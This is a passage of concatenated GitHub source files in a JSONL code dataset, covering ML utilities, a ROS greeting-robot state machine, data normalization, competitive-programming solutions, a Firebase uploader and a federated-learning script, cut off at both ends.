axis=[1, 2, 3])\n mean_p = tf.reduce_mean(ps, axis=[1, 2, 3])\n std_t = tf.reduce_sum(tf.sqrt(tf.square(mean_t)-tf.reduce_mean(tf.square(ts), axis=[1, 2, 3])), axis=[1, 2, 3])\n std_p = tf.reduce_sum(tf.sqrt(tf.square(mean_p)-tf.reduce_mean(tf.square(ps), axis=[1, 2, 3])), axis=[1, 2, 3])\n return -tf.reduce_mean((ts-mean_t)*(ps-mean_p) / (std_t*std_p+eps), axis=[1, 2, 3])\n'''\n","repo_name":"YipengHu/MPHY0041","sub_path":"tutorials/registration/tf_utils.py","file_name":"tf_utils.py","file_ext":"py","file_size_in_byte":7295,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"29810618636","text":"test = {\n 'name': 'Question 3.1.1',\n 'points': 2,\n 'suites': [\n {\n 'cases': [\n {\n 'code': r\"\"\"\n >>> len(my_20_features)\n 20\n >>> np.all([f in test_lyrics.labels for f in my_20_features])\n True\n \"\"\",\n 'hidden': False,\n 'locked': False\n },\n ],\n 'scored': True,\n 'setup': '',\n 'teardown': '',\n 'type': 'doctest'\n }\n ]\n}\n","repo_name":"data-8/data8assets","sub_path":"materials/sp16/labs/project2/tests/q311.py","file_name":"q311.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":102,"dataset":"github-code","pt":"37"} +{"seq_id":"37795036127","text":"import smach\nimport smach_ros\n\nfrom greeting_bot_state_machine import ask_want_quiz_states\nfrom greeting_bot_state_machine import ask_want_tour_states\nfrom greeting_bot_state_machine import auto_charge_states\nfrom greeting_bot_state_machine import cogrob_rosbag_states\nfrom greeting_bot_state_machine import engage_people_states\nfrom greeting_bot_state_machine import face_states\nfrom greeting_bot_state_machine import general_states\nfrom greeting_bot_state_machine import quiz_states\nfrom greeting_bot_state_machine import robot_pose_states\nfrom greeting_bot_state_machine import tour_states\nfrom greeting_bot_state_machine import trivia_mode\nfrom greeting_bot_state_machine import wait_trigger_states\n\n\nclass ResetSessionData(smach.State):\n def __init__(self):\n smach.State.__init__(\n self, outcomes=[\"next\"], output_keys=[\"should_train\", \"human_name\"])\n\n\n def execute(self, userdata):\n userdata.should_train = False\n userdata.human_name = None\n return \"next\"\n\n\nclass SetShouldTrainState(smach.State):\n def __init__(self):\n smach.State.__init__(self, outcomes=[\"next\"], output_keys=[\"should_train\"])\n\n\n def execute(self, userdata):\n userdata.should_train = True\n return \"next\"\n\n\nclass TestShouldTrainState(smach.State):\n def __init__(self):\n smach.State.__init__(\n self, outcomes=[\"affirmative\", \"negative\"], input_keys=[\"should_train\"])\n\n\n def execute(self, userdata):\n if userdata.should_train:\n return \"affirmative\"\n else:\n return \"negative\"\n\n\ndef GetGreetingBotTopStateMachine():\n sm = smach.StateMachine(outcomes=[\"finished\", \"error\"])\n sm.userdata.human_name = None\n sm.userdata.should_train = False\n\n with sm:\n smach.StateMachine.add(\n \"finish_rosbag_cleanup\",\n cogrob_rosbag_states.FinishRecording(),\n transitions={\"next\":\"test_charging\"})\n sm.set_initial_state([\"finish_rosbag_cleanup\"])\n\n test_charging_sm = auto_charge_states.GetAutoChargingStateMachine()\n smach.StateMachine.add(\n \"test_charging\", test_charging_sm,\n transitions={\"no_need_charge\": \"wait_for_trigger\",\n \"finished_charging\": \"go_prepare\",\n \"already_charging\": \"already_charging_delay\",\n \"interrupt\": \"wait_for_trigger\",\n \"failed\": \"error\"})\n\n smach.StateMachine.add(\n \"already_charging_delay\", general_states.WaitTimeState(1),\n transitions={\"next\": \"finish_rosbag_cleanup\"})\n\n go_prepare_sm = (\n robot_pose_states.GetGoToReadyPositionStateAndPrepareStateMachine())\n smach.StateMachine.add(\n \"go_prepare\", go_prepare_sm,\n transitions={\"success\": \"wait_for_trigger\",\n \"fail\": \"wait_for_trigger\"})\n\n wait_for_trigger_sm = (\n wait_trigger_states.GetWaitForTriggerMachine())\n smach.StateMachine.add(\n \"wait_for_trigger\", wait_for_trigger_sm,\n transitions={\"wakeword\": \"start_rosbag_recording_wakeword\",\n \"face\": \"start_rosbag_recording_face\",\n \"man_go_prep\": \"go_prepare\",\n \"man_go_charge\": \"go_charge_1\",\n \"nothing\": \"delay_restart\"})\n\n smach.StateMachine.add(\n \"go_charge_1\", robot_pose_states.GetPrepareToMoveStateMachine(),\n transitions={\"success\": \"go_charge_2\", \"fail\": \"finish_rosbag_cleanup\"})\n\n smach.StateMachine.add(\n \"go_charge_2\", auto_charge_states.GoDockingState(),\n transitions={\"done\": \"finish_rosbag_cleanup\",\n \"failed\": \"finish_rosbag_cleanup\"})\n\n smach.StateMachine.add(\n \"delay_restart\", general_states.WaitTimeState(.1),\n transitions={\"next\": \"finish_rosbag_cleanup\"})\n\n smach.StateMachine.add(\n \"start_rosbag_recording_face\", cogrob_rosbag_states.StartRecording(),\n transitions={\"next\":\"reset_session_data_face\"})\n\n smach.StateMachine.add(\n \"start_rosbag_recording_wakeword\",\n cogrob_rosbag_states.StartRecording(),\n transitions={\"next\":\"reset_session_data_wakeword\"})\n\n smach.StateMachine.add(\n \"reset_session_data_face\", ResetSessionData(),\n transitions={\"next\":\"greet_people_with_face\"},\n remapping={\"should_train\":\"should_train\", \"human_name\":\"human_name\"})\n\n smach.StateMachine.add(\n \"reset_session_data_wakeword\", ResetSessionData(),\n transitions={\"next\":\"ask_want_tour\"},\n remapping={\"should_train\":\"should_train\", \"human_name\":\"human_name\"})\n\n greet_people_with_face_sm = (\n engage_people_states.GetGreetPeopleWithFaceOrRememberFaceStateMachine())\n if trivia_mode.TRIVIA_MODE:\n smach.StateMachine.add(\n \"greet_people_with_face\", greet_people_with_face_sm,\n transitions={\"known_person\": \"ask_want_quiz\",\n \"unknown_person\": \"set_should_train\",\n \"error\": \"finish_rosbag_recording_error\"},\n remapping={\"human_name\":\"human_name\"})\n else:\n smach.StateMachine.add(\n \"greet_people_with_face\", greet_people_with_face_sm,\n transitions={\"known_person\": \"ask_want_tour\",\n \"unknown_person\": \"set_should_train\",\n \"error\": \"finish_rosbag_recording_error\"},\n remapping={\"human_name\":\"human_name\"})\n\n smach.StateMachine.add(\n \"set_should_train\", SetShouldTrainState(),\n transitions={\"next\":\"ask_want_quiz\"},\n remapping={\"should_train\":\"should_train\"})\n\n ask_want_quiz_sm = ask_want_quiz_states.GetAskWantQuizStateMachine()\n smach.StateMachine.add(\n \"ask_want_quiz\", ask_want_quiz_sm,\n transitions={\"want_quiz\": \"play_quiz\",\n \"dont_want_quiz\": \"ask_want_tour\",\n \"silence\": \"finish_rosbag_recording_error\"})\n\n quiz_sm = quiz_states.GetQuizStateMachine()\n smach.StateMachine.add(\n \"play_quiz\", quiz_sm,\n transitions={\"finished\": \"test_should_train\",\n \"silence\": \"finish_rosbag_recording_error\"})\n\n smach.StateMachine.add(\n \"test_should_train\", TestShouldTrainState(),\n transitions={\n \"affirmative\": \"train_on_face_with_name\",\n \"negative\": \"ask_want_tour\"},\n remapping={\"should_train\": \"should_train\"})\n\n smach.StateMachine.add(\n \"train_on_face_with_name\",\n face_states.TrainOnFaceWithNameState(),\n transitions={\"next\": \"ask_want_tour\"},\n remapping={\"human_name\": \"human_name\"})\n\n if trivia_mode.TRIVIA_MODE:\n smach.StateMachine.add(\n \"ask_want_tour\", general_states.BypassState(),\n transitions={\"next\": \"say_have_good_day\"})\n else:\n ask_want_tour_sm = ask_want_tour_states.GetAskWantTourStateMachine()\n smach.StateMachine.add(\n \"ask_want_tour\", ask_want_tour_sm,\n transitions={\"want_tour\": \"guide_tour\",\n \"dont_want_tour\": \"say_have_good_day\",\n \"silence\": \"finish_rosbag_recording_error\"})\n\n tour_sm = tour_states.GetTourGuideStateMachine()\n smach.StateMachine.add(\n \"guide_tour\", tour_sm,\n transitions={\"finished\": \"say_have_good_day_tour\",\n \"failed\": \"finish_rosbag_recording_before_go_prepare\"})\n\n smach.StateMachine.add(\n \"say_have_good_day_tour\", engage_people_states.SayHaveGoodDayState(),\n transitions={\"next\": \"finish_rosbag_recording_before_go_prepare\"})\n\n smach.StateMachine.add(\n \"finish_rosbag_recording_before_go_prepare\",\n cogrob_rosbag_states.FinishRecording(),\n transitions={\"next\":\"go_prepare\"})\n\n smach.StateMachine.add(\n \"say_have_good_day\", engage_people_states.SayHaveGoodDayState(),\n transitions={\"next\": \"finish_rosbag_recording_finished\"})\n\n smach.StateMachine.add(\n \"finish_rosbag_recording_finished\",\n cogrob_rosbag_states.FinishRecording(), transitions={\"next\":\"finished\"})\n\n smach.StateMachine.add(\n \"finish_rosbag_recording_error\",\n cogrob_rosbag_states.FinishRecording(), transitions={\"next\":\"error\"})\n\n return sm\n","repo_name":"CogRob/TritonBot","sub_path":"cogrob_ros/greeting_bot_state_machine/src/greeting_bot_state_machine/greeting_bot_top.py","file_name":"greeting_bot_top.py","file_ext":"py","file_size_in_byte":8050,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"32456281895","text":"\nimport datacube\nimport sys\nimport rasterio\nimport numpy as np\nimport time\nimport os\nimport subprocess\nfrom datacube.drivers.netcdf import netcdf_writer\nfrom datacube.drivers.netcdf import create_netcdf_storage_unit, write_dataset_to_netcdf\nimport xarray as xr\nfrom os import path\nfrom datacube.model import Measurement \nfrom datacube.model import DatasetType as Product\nfrom datacube.model.utils import make_dataset, xr_apply, datasets_to_doc\nfrom pathlib import Path\nfrom datacube.api.query import query_group_by, query_geopolygon\nfrom datacube.utils.geometry import CRS\nimport yaml\nfrom yaml import CSafeLoader as Loader, CSafeDumper as Dumper\n\ndef read_data_from_netcdf(fname):\n dataset_array = xr.open_dataset(fname)\n return dataset_array.damage_level\n\ndef count_damage(damage_level, axis, label=0):\n print(\"count\", label)\n print(\"axis\", axis)\n return np.unique(damage_level, axis=axis, return_counts=True)[1]\n\ndef main(x1, y1, year, name):\n start = int(year)\n end = int(year) + 1\n dir_name = 'cyclone_damage_results_v2/' + name \n\n fin = '_'.join([name, str(x1), str(y1), str(start), str(end)]) + '.nc'\n fin = path.join(dir_name, fin)\n if path.exists(fin) == False:\n return\n \n damage_level = read_data_from_netcdf(fin)\n results = np.zeros(damage_level.shape[1:], dtype='int16')\n\n while True:\n end += 1\n fin = '_'.join([name, str(x1), str(y1), str(start), str(end)]) + '.nc'\n fin = path.join(dir_name, fin)\n if path.exists(fin) == False:\n break\n\n damage_level = xr.concat([damage_level, read_data_from_netcdf(fin)], dim='time')\n\n tmp = damage_level.where(np.logical_and(damage_level<=2, damage_level > 0)).count(dim='time')\n results[tmp.values > 0] = 1\n results[tmp.values==damage_level.time.shape[0]] = 2\n\n tmp = damage_level.where(np.logical_and(damage_level<=4, damage_level > 2)).count(dim='time')\n results[tmp.values > 0] = 3\n results[tmp.values==damage_level.time.shape[0]] = 4\n\n tmp = damage_level.where(damage_level==4).count(dim='time')\n results[tmp.values==damage_level.time.shape[0]] = 5\n results[damage_level.values[0]==-1] = -1\n\n damage_level.time.attrs['units'] = \"seconds since 1970-01-01 00:00:00\"\n results = results.reshape((1, ) + results.shape)\n results = xr.Dataset({\"damage_level\":(['time', 'y', 'x'], results)}, \n coords={'time':damage_level.time[-1:], 'y': damage_level.y, 'x': damage_level.x},\n attrs={'crs': CRS('EPSG:3577')})\n print(results)\n\n fout = '_'.join([name, str(x1), str(y1), 'all']) + '.nc'\n write_dataset_to_netcdf(results, path.join(dir_name, fout))\n\nif __name__ == '__main__':\n\n nargv = len(sys.argv)\n if nargv!=5:\n print(\"Usage: whatever.py x1 y1 year name\")\n exit()\n\n args = sys.argv[1:]\n main(*args)\n","repo_name":"christopherowers/TC_mangroves","sub_path":"NCI_code_old/mangrove_change_on_cyclone_all.py","file_name":"mangrove_change_on_cyclone_all.py","file_ext":"py","file_size_in_byte":2843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20012831476","text":"import random\nimport bisect\nimport json\nfrom enum import Enum, auto\nimport datetime\n\nclass Doctor():\n def __init__(self, first_name, last_name):\n self.first_name = first_name\n self.last_name = last_name\n self.u_id = random.randint(1, 2**32-1)\n self.appointments = {}\n \n def add_appointment(self, appointment):\n if appointment.date in self.appointments:\n daily_appointments = self.appointments[appointment.date]\n daily_appointments.add(appointment)\n else:\n self.appointments[appointment.date] = {appointment}\n\n def delete_appointment(self, u_id):\n for date in self.appointments:\n for appointment in self.appointments[date]:\n if appointment.u_id == u_id:\n self.appointments[date].remove(appointment)\n return True\n return False\n\n def json(self):\n values = {\n 'first_name' : self.first_name,\n 'last_name' : self.last_name,\n 'u_id' : self.u_id\n }\n return values\n\n def __str__(self):\n return json.dumps(self.json())\n\nclass Appointment():\n class AppointmentType(Enum):\n FOLLOW_UP = auto()\n NEW_PATIENT = auto()\n\n def __init__(self, first_name, last_name, date, time, kind):\n \n time_splits = time.split(':')\n hour, minute = int(time_splits[0]), int(time_splits[1])\n\n date_splits = date.split('/')\n month, day, year = int(date_splits[0]), int(date_splits[1]), int(date_splits[2])\n\n time = datetime.time(hour=hour, minute=minute)\n print(date_splits)\n date = datetime.date(day=day, month=month, year=year)\n\n kind = Appointment.AppointmentType[kind]\n\n self.first_name = first_name\n self.last_name = last_name\n self.u_id = random.randint(1, 2**32-1)\n self.date = date\n self.time = time\n self.kind = kind\n\n def json(self):\n values = {\n 'first_name' : self.first_name,\n 'last_name' : self.last_name,\n 'u_id' : self.u_id,\n 'date' : str(self.date),\n 'time' : str(self.time),\n 'kind' : self.kind.name\n }\n return values\n\n def __str__(self):\n return json.dumps(self.json())\n\n","repo_name":"sachal6/NotableProject","sub_path":"database_objects.py","file_name":"database_objects.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15416358543","text":"from typing import List\nimport numpy as np\nimport pandas as pd\nimport os\n\nimport utils.util_functions as utils\nfrom utils.SYSCONFIG import DATA_PATH, PLATFORM\nfrom data_processing.normalization_functions.min_max_symmetrical import min_max_symmetrical\nfrom data_processing.normalization_functions.tanh_estimator import tanh_estimator\nfrom data_processing.normalization_functions.standardization import standardization\nfrom data_processing.normalization_functions.median_normalization import median_normalization\nfrom data_processing.normalization_functions.sigmoid_normalization import sigmoid_normalization\nfrom data_processing.normalization_functions.decimal_scaling_normalization import decimal_scaling_normalization\n\nimport data_generator.batch_data_path_generator as pg\n\ndef send_message(message: str, **kwargs) -> None:\n utils.printc(source='[DATA NORMALIZATION]', message=message, **kwargs)\n\nFILE_COLUMN_NAME = 'Path'\n\n\ndef load_csv_files(path_list: List[str]) -> List[pd.DataFrame]:\n dfs : List[pd.DataFrame] = []\n\n file_count = len(path_list)\n bar = utils.CustomBar('Loading files ... ', max=file_count)\n\n index = 0\n\n for path in path_list:\n #if index > 5: break\n index += 1\n df : pd.DataFrame = pd.read_csv(path, index_col=False)\n df[FILE_COLUMN_NAME] = path\n dfs.append(df)\n bar.next()\n\n return dfs\n\ndef normalize_df(df: pd.DataFrame, normalization_function) -> pd.DataFrame:\n # get iterate though each row\n\n for column_name in df:\n\n name : str = column_name\n values = df[column_name].tolist()\n\n # Only take values that are full off numbers\n if all([isinstance(value, str) for value in values]) or name in ['LFA','RFA']: \n # send_message(f'Skipping {name} as it does not contain only numbers or it is a label column')\n continue\n\n #send_message(f'Normalizing {name} ...')\n\n normalized_values = normalization_function(values)\n df[column_name] = normalized_values\n \n return df\n\ndef split_and_save_df(\n df: pd.DataFrame,\n original_file_index: List[str],\n target_folder_path: str,\n target_index_path: str\n) -> List[pd.DataFrame]: \n \n paths_count = len(original_file_index)\n bar = utils.CustomBar('Saving DataFrames to files ... ', max=paths_count)\n\n paths : List[str] = []\n\n utils.create_folder_if_not_exists(target_folder_path)\n\n delimiter = '\\\\' if PLATFORM == 'WINDOWS' else '/'\n\n for path in original_file_index:\n \n frame = df.loc[(df[FILE_COLUMN_NAME] == path)]\n frame = frame.drop(columns=[FILE_COLUMN_NAME])\n\n file_name = path.split(delimiter)[-1]\n new_path = os.path.join(target_folder_path,file_name)\n\n paths.append(new_path)\n frame.to_csv(new_path,index=False)\n\n header = str(list(frame.columns)).replace('[','').replace(']','').replace(\"'\",\"\").replace(', ',',')\n\n np.savetxt(new_path, frame.values, delimiter=\",\",fmt='%10.8f',header=header,comments='')\n\n bar.next()\n\n with open(target_index_path, 'w') as f:\n for path in paths:\n f.write('%s\\n' % path)\n\ndef data_concatenation(normalization_mode: str, data_frames: List[pd.DataFrame]) ->List[pd.DataFrame]: \n '''_summary_\n\n Args:\n normalization_mode (str): The mode of the normalization, which defines in \n which subsets the files are passed to the normalization function\n data_frames (List[pd.DataFrame]): The data as one DataFrame per file/time series \n\n Returns:\n List[pd.DataFrame]: The data separated accordingly to the normalization_mode\n '''\n\n send_message(f'Started concatenation of the data with the following mode: {normalization_mode}')\n\n\n # combine the whole data to one big DataFrame\n if normalization_mode == 'by_all':\n combined_frame = pd.concat(data_frames)\n return [combined_frame]\n \n # return the data with one DataFrame by file/time series\n if normalization_mode == 'by_time_series':\n return data_frames\n\n send_message(f'No normalization_mode found for {normalization_mode}')\n return None\n\ndef apply_normalization(data_frames: List[pd.DataFrame], normalization_function: str) -> List[pd.DataFrame]:\n\n dfs_count = len(data_frames)\n bar = utils.CustomBar('Normalizing data frames ... ', max=dfs_count)\n\n\n send_message(f'Starting normalization of {dfs_count} DataFrames using {normalization_function}')\n\n # define a normalization function for the data frame\n norm_func = None\n\n # Select a data from\n if normalization_function == 'min_max_symmetrical':\n norm_func = lambda row : min_max_symmetrical(row,y_extent=1)\n\n elif normalization_function == 'tanh_estimator':\n norm_func = lambda row : tanh_estimator(row)\n\n elif normalization_function == 'standardization':\n norm_func = lambda row : standardization(row)\n\n elif normalization_function == 'median_normalization':\n norm_func = lambda row : median_normalization(row)\n\n elif normalization_function == 'sigmoid_normalization':\n norm_func = lambda row : sigmoid_normalization(row)\n\n elif normalization_function == 'decimal_scaling_normalization':\n norm_func = lambda row : decimal_scaling_normalization(row)\n\n else:\n send_message('No normalization function was found! Using fallback min_max_symmetrical')\n norm_func = lambda row : min_max_symmetrical(row,y_extent=1)\n\n normalized_data_frames = [None] * dfs_count \n\n # iterate though all data_frames and normalize them\n for i in range(dfs_count):\n data_frame = data_frames[i]\n normalized_data_frame = normalize_df(data_frame,norm_func)\n normalized_data_frames[i] = normalized_data_frame\n\n bar.next()\n\n return normalized_data_frames\n\n\n\n\ndef normalize(\n dataset_name: str,\n normalization_mode: str,\n normalization_function: str,\n):\n\n send_message('Started normalization for the following parameters:')\n send_message(f'dataset_name: {dataset_name}')\n send_message(f'normalization_mode: {normalization_mode}')\n send_message(f'normalization_function: {normalization_function}')\n\n\n original_data_index_path: str = pg.get_original_csv_index_path(\n data_subset_name = dataset_name\n )\n\n # load the index of the original data\n original_data_index : List[str] = utils.parse_index(original_data_index_path, verify=True)\n\n # load the data\n original_data : List[pd.DataFrame] = load_csv_files(original_data_index)\n\n separated_data = data_concatenation(normalization_mode=normalization_mode, data_frames=original_data)\n\n normalized_data = apply_normalization(data_frames=separated_data,normalization_function=normalization_function)\n\n # create on combined big table to reuse saving code\n combined_normalized_data = pd.concat(normalized_data)\n\n # split the previously merged CSVs and save them with the corresponding appendix\n\n normalization_folder_path: str = pg.get_folder_path(\n data_subset_name = dataset_name,\n normalization_function = normalization_function,\n normalization_mode = normalization_mode,\n )\n\n normalized_data_index_path: str = pg.get_csv_index_path(\n data_subset_name = dataset_name,\n normalization_function = normalization_function,\n normalization_mode = normalization_mode,\n )\n \n split_and_save_df(\n df = combined_normalized_data,\n original_file_index = original_data_index,\n target_folder_path = normalization_folder_path,\n target_index_path = normalized_data_index_path\n )\n","repo_name":"andfaxle/cAIsar-ai-cup","sub_path":"src/data_processing/data_normalization_utils.py","file_name":"data_normalization_utils.py","file_ext":"py","file_size_in_byte":7603,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"12638393009","text":"from typing import List\n\n\nclass Solution:\n def subArrayRanges(self, nums: List[int]) -> int:\n res = 0\n\n # nums.sort()\n\n l, r = 0, len(nums) -1\n\n while (l < len(nums)):\n r = len(nums) -1\n sub = nums[l:r+1]\n prevMax, prevMin = max(sub), min(sub)\n while r > l:\n res += prevMax - prevMin\n r -= 1\n if(prevMax == nums[r+1]):\n prevMax = max(nums[l:r+1])\n if(prevMin == nums[r+1]):\n prevMin = min(nums[l:r+1])\n\n l += 1\n return res\n\n\ns = Solution();\n\nres = s.subArrayRanges([0])\nprint (res)","repo_name":"segios/problems","sub_path":"python-problems/Arrays/2104.py","file_name":"2104.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37383258995","text":"import sys\n\nrl = sys.stdin.readline\n\n\nprev_dyadic_map = [[0]]\ndyadic_map = [] # silence pyright\nN = 0\n\nwhile N < 5:\n dyadic_map = []\n for i in range(2**N):\n dyadic_map.append(\n prev_dyadic_map[i] + [4**N + x for x in reversed(prev_dyadic_map[i])]\n )\n for i in range(2**N):\n dyadic_map.append([2 * 4**N + x for x in dyadic_map[2**N - (i + 1)]])\n prev_dyadic_map = dyadic_map\n N += 1\n\n\ndef c(i, j):\n return dyadic_map[i][j]\n\n\nlookup: dict[int, tuple[int, int]] = {}\nfor i in range(32):\n for j in range(32):\n lookup[c(i, j)] = (i + 1, j + 1)\n\n\nn, k = [int(_) for _ in rl().split()]\n\nfor i in range(n):\n print(\" \".join([str(c(i, j) ^ c(i, j + 1)) for j in range(n - 1)]))\nfor i in range(n - 1):\n print(\" \".join([str(c(i, j) ^ c(i + 1, j)) for j in range(n)]))\n\nsys.stdout.flush()\n\nbnum = 0\nfor _ in range(k):\n bnum ^= int(rl())\n row, col = lookup[bnum]\n print(row, col)\n sys.stdout.flush()\n","repo_name":"vEnhance/evan-learns-ioi","sub_path":"CodeForces/1673F/1673F.py","file_name":"1673F.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"7048648331","text":"import file_utils\nfrom firebase_admin import firestore\nfrom firebase_admin import storage\n\nclass PhotosCollectionManager():\n COLLECTION_PHOTOS = \"Photos\"\n KEY_PHOTO_URL = \"url\"\n KEY_PHOTO_CAPTION = \"caption\"\n KEY_PHOTO_CREATED = \"created\"\n \n \"\"\" Handles Firestore interactions for Photo objects. \"\"\"\n def __init__(self):\n self.ref = firestore.client().collection(self.COLLECTION_PHOTOS)\n\n def add_photo(self, photo_path):\n \"\"\" Uploads the file to Firebase Storage and creates a Firestore document based on the image url. \"\"\"\n download_url = self.upload_file(photo_path)\n if download_url is not None:\n caption = file_utils.get_caption()\n self.ref.add({\n self.KEY_PHOTO_CAPTION: caption,\n self.KEY_PHOTO_URL: download_url,\n self.KEY_PHOTO_CREATED: firestore.SERVER_TIMESTAMP\n })\n else:\n print(\"No photo added due to error during upload.\")\n\n def upload_file(self, photo_path):\n \"\"\" Uploads the file to Firebase Storage and returns the download url. \"\"\"\n try:\n filename = file_utils.remove_path(photo_path)\n print(filename)\n image_blob = storage.bucket().blob(f\"photos/{filename}\") # In Firebase Storage use the filename as the ref\n image_blob.upload_from_filename(photo_path)\n image_blob.make_public()\n print(\"File uploaded!\")\n return image_blob.public_url\n except Exception as err:\n print(\"An exception occurred during upload\", err)\n","repo_name":"fisherds/RPi","sub_path":"InitialLearning/PythonLearning/FirestoreViaPython/tank/firebase_photos.py","file_name":"firebase_photos.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"37182504302","text":"import hydra\nfrom hydra.core.hydra_config import HydraConfig\nfrom omegaconf import DictConfig, OmegaConf\nimport pickle\nfrom pathlib import Path\nimport flwr as fl\nimport torch\n\nfrom dataset import prepare_dataset\nfrom client import generate_client_fn\nfrom server import get_on_fit_config_fn, get_evaluate_fn, AggregateCustomMetricStrategy\n\n@hydra.main(config_path='conf', config_name='base', version_base=None)\n\ndef main(cfg: DictConfig):\n\n ## 1. Parse config and print experiment output dir\n print(OmegaConf.to_yaml(cfg))\n\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n print(f\"Training on {device} using PyTorch {torch.__version__} and Flower {fl.__version__}\\n\")\n\n ## 2. Prepare dataset\n #trainloaders, validationloaders, testloader = dataset_femnist(cfg.batch_size)\n trainloaders, validationloaders, testloader = prepare_dataset(cfg.num_clients, cfg.batch_size)\n print(\"FEMNIST Dataset prepared\\n\")\n\n ## 3. Define clients\n client_fn = generate_client_fn(trainloaders, validationloaders, cfg.num_classes)\n\n ## 4. Define strategy\n strategy = AggregateCustomMetricStrategy( # fl.server.strategy.FedAvg\n min_fit_clients=cfg.num_clients,\n min_evaluate_clients=cfg.num_clients,\n min_available_clients=cfg.num_clients,\n on_fit_config_fn=get_on_fit_config_fn(cfg.config_fit),\n evaluate_fn=get_evaluate_fn(cfg.num_classes, testloader),\n on_evaluate_config_fn=None,\n accept_failures=False,\n )\n \n ## 5. Start Simulation \n history = fl.simulation.start_simulation(\n client_fn=client_fn,\n num_clients=cfg.num_clients,\n config=fl.server.ServerConfig(num_rounds=cfg.num_rounds),\n strategy=strategy,\n #client_resources={'num_cpus': cfg.num_cpus, 'num_gpus': cfg.num_gpus},\n #server=fl.server.Server(client_manager=fl.server.client_manager.SimpleClientManager(), strategy=strategy)\n )\n\n ## 6. Save your results\n save_path = HydraConfig.get().runtime.output_dir\n results_path = Path(save_path) / 'result.pkl'\n\n results = {'history':history}\n\n with open(str(results_path), 'wb') as h:\n pickle.dump(results, h, protocol=pickle.HIGHEST_PROTOCOL)\n\n \n\n\nif __name__ == '__main__':\n main()\n \n '''\n trainloader, testloader = get_mnist_loaders(cfg.batch_size)\n\n server = CentralizedServer(cfg.num_clients, cfg.batch_size, cfg.num_rounds, cfg.num_classes, trainloader, device)\n print(\"Start training ...\\n\")\n server.train(cfg.config_fit, device)\n print(\"\\nEvaluate model ...\\n\")\n loss, accuracy = server.evaluate(testloader, device)\n print(\"Loss: \", loss)\n print(\"Accuracy: \", accuracy)\n\n___________________________________________________________\n\n\n net = Net(cfg.num_classes).to(device)\n model = Net(cfg.num_classes)\n optimizer = torch.optim.SGD(model.parameters(), lr=cfg.config_fit.lr, momentum=cfg.config_fit.momentum)\n\n print(\"Start training\\n\")\n train(net, trainloader, optimizer, cfg.num_rounds, device)\n print(\"Evaluate model\\n\")\n loss, accuracy = test(net, testloader, device)\n print(\"Loss: \", loss)\n print(\"Accuracy: \", accuracy)\n '''","repo_name":"NartoTeroKK/partial-fed-learning","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"16758265042","text":"import sys\n\nt = int(sys.stdin.readline().strip())\nfor i in range(t):\n command = sys.stdin.readline().strip()\n arr_len = int(sys.stdin.readline().strip())\n if (arr_len == 0):\n input_arr = sys.stdin.readline().split()\n input_arr = []\n else:\n input_arr = list(map(int, sys.stdin.readline().strip()[1:-1].split(',')))\n is_reverse = False\n is_ok = True\n front = 0\n back = 0\n for act in command:\n try:\n if act == 'R':\n is_reverse = not is_reverse\n elif act == 'D' and not is_reverse:\n front += 1\n elif act == 'D' and is_reverse:\n back += 1\n except:\n is_ok = False\n print('error')\n break\n if is_ok == True:\n if (front + back) <= arr_len:\n if not is_reverse:\n input_arr = input_arr[front:arr_len - back]\n print(str(input_arr).replace(' ', ''))\n else:\n input_arr = input_arr[::-1][back:arr_len - front]\n print(str(input_arr).replace(' ', ''))\n else:\n print('error')\n","repo_name":"good5229/python-practice","sub_path":"5430.py","file_name":"5430.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15947913298","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\nimport uncertainties as unc\nfrom uncertainties import unumpy as unp\n\ndef gaussian(x, a, b, c):\n return a * np.exp(-((x - b)**2) / (2 * c**2))\n\n\ndados_10 = pd.read_excel('Sessao_5/dados.xlsx', sheet_name='10')\ndados_5 = pd.read_excel('Sessao_5/dados.xlsx', sheet_name='5')\n\ny_10 = dados_10['h [mm]']\ny_5 = dados_5['h [mm]']\nRc_10 = dados_10['Rc corr']\neRc_10 = dados_10['eRc corr']\nRc_5 = dados_5['Rc corr']\neRc_5 = dados_5['eRc corr']\n\n# Ajuste da gaussiana para Rc_10 com erros\nparams_10, covariance_10 = curve_fit(gaussian, y_10, Rc_10, p0=[1, 10, 1], sigma=eRc_10)\n\n# Ajuste da gaussiana para Rc_5 com erros\nparams_5, covariance_5 = curve_fit(gaussian, y_5, Rc_5, p0=[1, 10, 1], sigma=eRc_5)\n\na_10, b_10, c_10 = params_10\na_5, b_5, c_5 = params_5\n\n# Qui-quadrado e número de graus de liberdade (ndf) para Rc_10\nchi_squared_10 = np.sum(((Rc_10 - gaussian(y_10, *params_10)) / eRc_10)**2)\nndf_10 = len(y_10) - len(params_10)\n\n# Qui-quadrado e número de graus de liberdade (ndf) para Rc_5\nchi_squared_5 = np.sum(((Rc_5 - gaussian(y_5, *params_5)) / eRc_5)**2)\nndf_5 = len(y_5) - len(params_5)\n\n# Plot dos dados, curva ajustada e erros para Rc_10\nplt.errorbar(y_10, Rc_10, yerr=eRc_10, label=f'10 $\\mu Ci$ em cima', capsize=1, markersize=2, ecolor='red', color='red', 